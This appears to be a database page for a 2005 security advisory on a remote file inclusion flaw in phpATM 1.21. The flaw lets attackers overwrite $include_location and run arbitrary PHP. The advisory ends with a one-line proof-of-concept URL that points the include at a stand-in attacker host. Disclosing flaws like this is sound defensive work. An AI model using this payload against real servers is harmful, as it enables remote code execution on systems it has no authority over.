Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIngvar GilbertPACKETSTORM:39285
HistoryAug 14, 2005 - 12:00 a.m.

phpATMinclude.txt

2005-08-1400:00:00
Ingvar Gilbert
packetstormsecurity.com
16
JSON
`Affected product: phpATM  
Version vulnerable: 1.21, and probably earlier.  
Risk: High, execution of arbitrary PHP  
Vendor informed: Not possible (mail bounces with 550, tried twice)  
Vendor URL: http://phpatm.free.fr/  
  
phpATM seems to be some up-/downloadscript for web environments. The  
discussed vulnerability was found exploited in the wild.  
  
phpATM allows the execution of arbitrary PHP code via remote includes,  
when allow_url_fopen is set. The global variable $include_location ist  
used with include(), and can be used by attackers to run any code with  
the privileges of the web user.  
  
The security flaw is located in `include/common.php', near line 91,  
where content from the superglobal arrays is moved into global context.  
This can be used to overwrite the earlier defined global  
$include_location. Bulk-copying stuff into global context is a very bad  
idea, as this can easily be abused to overwrite security related variables.  
  
PoC: http://victim/index.php?include_location=http://attacker/  
  
Regards,  
Ingvar  
`
JSON